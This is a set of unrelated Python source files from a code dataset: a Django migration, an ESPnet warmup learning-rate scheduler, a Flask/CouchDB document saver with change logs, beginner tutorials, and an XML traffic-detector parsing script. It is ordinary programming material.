                    if self.learningRateD < 0.0001:
                        self.learningRateD = 2e-4
            if (counter % 500) == 0:
                if self.Class_weight:
                    # Gradually grow `la`, capped at 25.
                    if self.la > 25:
                        self.la = 25
                    else:
                        self.la = self.la * 1.5
            counter += 1
7,694 | 211ef4c64e42c54423ac8dab2128952874a2cf5a | # Generated by Django 2.2.10 on 2020-03-13 14:02
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the boolean flag
    ``Setting.runned_locations_initial_data`` (default False) and makes
    ``Location.name`` unique."""
    dependencies = [
        ('system', '0005_location'),
    ]
    operations = [
        migrations.AddField(
            model_name='setting',
            name='runned_locations_initial_data',
            field=models.BooleanField(blank=True, default=False),
        ),
        migrations.AlterField(
            model_name='location',
            name='name',
            field=models.CharField(max_length=128, unique=True),
        ),
    ]
|
7,695 | bce16762c0739087a8309872da4ac04298c50893 | """Step (with Warm up) learning rate scheduler module."""
from typing import Union
import torch
from torch.optim.lr_scheduler import _LRScheduler
from typeguard import check_argument_types
from espnet2.schedulers.abs_scheduler import AbsBatchStepScheduler
class WarmupStepLR(_LRScheduler, AbsBatchStepScheduler):
    """The WarmupStepLR scheduler.
    This scheduler is the combination of WarmupLR and StepLR:
    WarmupLR:
        lr = optimizer.lr * warmup_step ** 0.5
                 * min(step ** -0.5, step * warmup_step ** -1.5)
    WarmupStepLR:
        if step <= warmup_step:
            lr = optimizer.lr * warmup_step ** 0.5
                * min(step ** -0.5, step * warmup_step ** -1.5)
        else:
            lr = optimizer.lr * (gamma ** (epoch//step_size))
    Note that the maximum lr equals to optimizer.lr in this scheduler.
    NOTE(review): the implementation below actually performs LINEAR warmup
    (lr * step / warmup_steps), not the inverse-sqrt curve shown above --
    confirm which formula is intended.
    """
    def __init__(
        self,
        optimizer: torch.optim.Optimizer,
        # for WarmupLR
        warmup_steps: Union[int, float] = 25000,
        # for StepLR
        steps_per_epoch: int = 10000,
        step_size: int = 1,
        gamma: float = 0.1,
        last_epoch: int = -1,
    ):
        assert check_argument_types()
        self.warmup_steps = warmup_steps
        # Counters advanced by get_lr(), which is called once per batch step.
        self.step_num = 0
        self.epoch_num = 0
        # NOTE: This number should be adjusted accordingly
        # once batch_size/ngpu/num_nodes is changed.
        # To get the exact number of iterations per epoch, refer to
        # https://github.com/espnet/espnet/discussions/4404
        self.steps_per_epoch = steps_per_epoch
        self.warmup_epoch = warmup_steps // steps_per_epoch
        # Linear warmup slope: lr reaches base_lr at step_num == warmup_steps.
        self.lr_scale = warmup_steps**-1
        # after warmup_steps, decrease lr by `gamma` every `step_size` epochs
        self.step_size = step_size
        self.gamma = gamma
        # __init__() must be invoked before setting field
        # because step() is also invoked in __init__()
        super().__init__(optimizer, last_epoch)
    def __repr__(self):
        return (
            f"{self.__class__.__name__}(warmup_steps={self.warmup_steps}, "
            f"steps_per_epoch={self.steps_per_epoch},"
            f" step_size={self.step_size}, gamma={self.gamma})"
        )
    def get_lr(self):
        # Stateful: each call advances step_num (and epoch_num at epoch
        # boundaries), so this must be called exactly once per batch step.
        self.step_num += 1
        if self.step_num % self.steps_per_epoch == 0:
            self.epoch_num += 1
        if self.step_num <= self.warmup_steps:
            # Linear warmup toward each parameter group's base lr.
            return [lr * self.lr_scale * self.step_num for lr in self.base_lrs]
        else:
            # Step decay: gamma ** (full epochs since warmup // step_size).
            return [
                lr
                * self.gamma ** ((self.epoch_num - self.warmup_epoch) // self.step_size)
                for lr in self.base_lrs
            ]
|
7,696 | 83fe635e35711c2c41d043a59d00a50cc87e69fa | "Base document saver context classes."
import copy
import os.path
import sys
import flask
from . import constants
from . import utils
class BaseSaver:
    """Base document saver context.

    Use as a context manager: on clean exit the document is stamped with
    doctype/modified, written to the CouchDB handle in ``flask.g.db``,
    and a log entry recording the changes is stored alongside it.
    """
    # Subclasses must set the document type stored in the "doctype" field.
    DOCTYPE = None
    # Key paths excluded from the change log entirely.
    EXCLUDE_PATHS = [["_id"], ["_rev"], ["doctype"], ["modified"]]
    # Key paths whose values are logged as "<hidden>" (e.g. passwords).
    HIDDEN_VALUE_PATHS = []
    def __init__(self, doc=None):
        # No doc: start a fresh document; otherwise keep a deep copy of
        # the original so add_log() can diff against it later.
        if doc is None:
            self.original = {}
            self.doc = {"_id": utils.get_iuid(),
                        "created": utils.get_time()}
            self.initialize()
        else:
            self.original = copy.deepcopy(doc)
            self.doc = doc
            self.prepare()
    def __enter__(self):
        return self
    def __exit__(self, etyp, einst, etb):
        # Returning False on an exception propagates it; nothing is saved.
        if etyp is not None: return False
        self.finish()
        self.doc["doctype"] = self.DOCTYPE
        self.doc["modified"] = utils.get_time()
        flask.g.db.put(self.doc)
        self.add_log()
    def __getitem__(self, key):
        # Dict-style access delegates to the underlying document.
        return self.doc[key]
    def __setitem__(self, key, value):
        self.doc[key] = value
    def initialize(self):
        "Initialize the new document."
        pass
    def prepare(self):
        "Preparations before making any changes."
        pass
    def finish(self):
        "Final changes and checks on the document before storing it."
        pass
    def wrapup(self):
        """Wrap up the save operation by performing actions that
        must be done after the document has been stored.
        """
        pass
    def add_log(self):
        """Add a log entry recording the the difference betweens the current and
        the original document, hiding values of specified keys.
        'added': list of keys for items added in the current.
        'updated': dictionary of items updated; original values.
        'removed': dictionary of items removed; original values.
        """
        # self.stack tracks the current key path while diff() recurses.
        self.stack = []
        diff = self.diff(self.original, self.doc)
        entry = {"_id": utils.get_iuid(),
                 "doctype": constants.DOCTYPE_LOG,
                 "docid": self.doc["_id"],
                 "diff": diff,
                 "timestamp": utils.get_time()}
        # Hook for subclasses to augment the log entry.
        self.modify_log_entry(entry)
        if hasattr(flask.g, "current_user") and flask.g.current_user:
            entry["username"] = flask.g.current_user["username"]
        else:
            entry["username"] = None
        # Outside a request (e.g. CLI scripts) record the script name instead.
        if flask.has_request_context():
            entry["remote_addr"] = str(flask.request.remote_addr)
            entry["user_agent"] = str(flask.request.user_agent)
        else:
            entry["remote_addr"] = None
            entry["user_agent"] = os.path.basename(sys.argv[0])
        flask.g.db.put(entry)
    def diff(self, old, new):
        """Find the differences between the old and the new documents.
        Uses a fairly simple algorithm which is OK for shallow hierarchies.
        """
        added = {}
        removed = {}
        updated = {}
        new_keys = set(new.keys())
        old_keys = set(old.keys())
        # Keys only in the new document.
        for key in new_keys.difference(old_keys):
            self.stack.append(key)
            if self.stack not in self.EXCLUDE_PATHS:
                if self.stack in self.HIDDEN_VALUE_PATHS:
                    added[key] = "<hidden>"
                else:
                    added[key] = new[key]
            self.stack.pop()
        # Keys only in the old document.
        for key in old_keys.difference(new_keys):
            self.stack.append(key)
            if self.stack not in self.EXCLUDE_PATHS:
                if self.stack in self.HIDDEN_VALUE_PATHS:
                    removed[key] = "<hidden>"
                else:
                    removed[key] = old[key]
            self.stack.pop()
        # Keys in both: recurse into nested dicts, otherwise compare values.
        for key in new_keys.intersection(old_keys):
            self.stack.append(key)
            if self.stack not in self.EXCLUDE_PATHS:
                new_value = new[key]
                old_value = old[key]
                if isinstance(new_value, dict) and isinstance(old_value, dict):
                    changes = self.diff(old_value, new_value)
                    if changes:
                        if self.stack in self.HIDDEN_VALUE_PATHS:
                            updated[key] = "<hidden>"
                        else:
                            updated[key] = changes
                elif new_value != old_value:
                    if self.stack in self.HIDDEN_VALUE_PATHS:
                        updated[key]= dict(new_value="<hidden>",
                                           old_value="<hidden>")
                    else:
                        updated[key]= dict(new_value= new_value,
                                           old_value=old_value)
            self.stack.pop()
        result = {}
        if added:
            result['added'] = added
        if removed:
            result['removed'] = removed
        if updated:
            result['updated'] = updated
        return result
    def modify_log_entry(self, entry):
        "Modify the log entry, if required."
        pass
class AttachmentsSaver(BaseSaver):
    "Document saver context handling attachments."
    def prepare(self):
        # Queues of pending attachment operations, applied in wrapup().
        self._delete_attachments = set()
        self._add_attachments = []
    def wrapup(self):
        """Delete any specified attachments.
        Store the input files as attachments.
        Must be done after document is saved.
        """
        for filename in self._delete_attachments:
            rev = flask.g.db.delete_attachment(self.doc, filename)
            self.doc["_rev"] = rev
        for attachment in self._add_attachments:
            flask.g.db.put_attachment(self.doc,
                                      attachment["content"],
                                      filename=attachment["filename"],
                                      content_type=attachment["mimetype"])
    def add_attachment(self, filename, content, mimetype):
        "Queue an attachment for storage during wrapup()."
        self._add_attachments.append({"filename": filename,
                                      "content": content,
                                      "mimetype": mimetype})
    def delete_attachment(self, filename):
        "Queue an attachment for deletion during wrapup()."
        self._delete_attachments.add(filename)
    def modify_log_entry(self, entry):
        """Add info about attachment changes to the log entry.
        BUG FIX: this hook was previously named 'modify_log_items', so the
        base class (which calls self.modify_log_entry) never invoked it and
        attachment changes were never logged.  It also popped 'content' out
        of the pending additions, which would have broken the later
        wrapup() call; build summary dicts instead of mutating the queue.
        """
        if self._delete_attachments:
            # Sorted list: JSON-serializable (a set is not) and deterministic.
            entry["attachments_deleted"] = sorted(self._delete_attachments)
        if self._add_attachments:
            entry["attachments_added"] = [
                {"filename": att["filename"],
                 "mimetype": att["mimetype"],
                 "size": len(att["content"])}
                for att in self._add_attachments]
|
7,697 | f4dd9500835cb22a859da8bd57487052522bb593 |
alien_0 = {} # 声明一个空字典
alien_0['color'] = 'green' # 向空字典中添加值
alien_0['points'] = 5
print(alien_0)
x = alien_0['color']
print(f"\nThe alien is {alien_0['color']}") # 引号的用法
alien_0['color'] = 'yellow' # 对字典中的元素重新赋值
print(f"The alien is now {alien_0['color']}")
|
7,698 | 64c4b64b6fb0cfa25c17f66243c60a5dc0166017 | #!/usr/bin/python
#Autor: Jesus Fabian Cubas <jfabian@computer.org>
# --- if / elif / else (Python 2 print statements throughout) ---
sesion = 2
if sesion == 1 :
    print 'estamos en la sesion 01'
elif sesion == 2 :
    print 'estamos en la sesion 02'
else :
    print 'no estamos en la sesion 01'
# --- while: count (and print) 1 through 18 ---
edad = 0
while edad < 18 :
    edad = edad + 1
    print edad
# --- for: iterate over a list ---
lista = ["a", "b", "c", "d"]
for elemento in lista :
    print elemento
|
7,699 | 2b7bb02a25504e7481d3bc637ea09bcf9addb990 | import os
from xml.dom import minidom
import numpy as np
def get_branches_dir(root_dir):
    """Return root_dir-prefixed paths for every entry directly inside root_dir.

    Kept equivalent to the original pop()-driven while loop, so entries
    come out in the reverse of os.listdir() order.
    """
    entries = os.listdir(root_dir)
    return [root_dir + '/' + entry for entry in reversed(entries)]
def tolist(xml, detname):
    """Parse one detector XML file and append volume/occupancy/speed
    aggregates for each detector named in `detname` to the module-level
    `detectorData`; unparseable files are appended to `ErrorFiles`.

    NOTE(review): laneVolume/laneOccupancy/laneSpeed are initialised once
    before the detector loop, so they accumulate ACROSS matching
    detectors in the file -- confirm this running total is intended.
    """
    try:
        data = minidom.parse(xml)
    except:
        # Any parse failure: remember the file and skip it.
        print('parse error')
        ErrorFiles.append(xml)
        return
    detectors = data.documentElement
    date = detectors.getElementsByTagName('date')[0].childNodes[0].data
    time = detectors.getElementsByTagName('time')[0].childNodes[0].data
    dets = detectors.getElementsByTagName('detector')
    laneVolume = 0
    laneOccupancy = 0
    laneSpeed = 0
    for det in dets:
        try:
            detectorID = det.getElementsByTagName('detector-Id')[0]
        except IndexError:
            # Detector element without an Id: skip it.
            continue
        # print"\ndetector-Id: %s" % detectorID.childNodes[0].data
        if detectorID.childNodes[0].data in detname:
            lanes = det.getElementsByTagName('lane')
            for lane in lanes:
                # laneNumber = lane.getElementsByTagName('lane-Number')[0]
                laneStatus = lane.getElementsByTagName('lane-Status')[0]
                if laneStatus.childNodes[0].data == "OK":
                    try:
                        # Occupancy and speed are volume-weighted sums;
                        # they are divided by total volume below.
                        laneVolume += int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
                        laneOccupancy += int(lane.getElementsByTagName('lane-Occupancy')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
                        laneSpeed += int(lane.getElementsByTagName('lane-Speed')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
                    except IndexError:
                        # Missing lane fields: stop processing this detector's lanes.
                        break
                else:
                    # First non-OK lane aborts this detector's lane scan.
                    break
            if laneVolume > 0:
                # Locate this detector's slot and record the aggregates.
                for i in range(0, len(detname)):
                    if detectorID.childNodes[0].data == detname[i]:
                        c = i
                detectorData[c][0].append(date)
                detectorData[c][1].append(time)
                detectorData[c][2].append(laneVolume)
                detectorData[c][3].append(laneOccupancy/float(laneVolume))
                detectorData[c][4].append(laneSpeed/float(laneVolume))
# Walk one month of per-day folders, aggregate the XML detector reports,
# and save one numpy array per detector per day.
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir) # change the current working directory to path.
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D', 'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
    # One [dates, times, volumes, occupancies, speeds] slot per detector.
    detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []]]
    xmlFiles = get_branches_dir(dayFile)
    for xml in xmlFiles:
        if not os.path.isdir(xml):
            print(xml)
            tolist(xml, detNames)
    for i in range(0, len(detNames)):
        m = np.array(detectorData[i])
        os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/'+detNames[i])
        # NOTE(review): the filename uses detectorData[0][0][0] (detector 0's
        # first date) for every i -- probably fine if all detectors share the
        # same date, but raises IndexError if detector 0 has no data; confirm
        # whether detectorData[i][0][0] was intended.
        np.save(detectorData[0][0][0]+'.npy', m)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.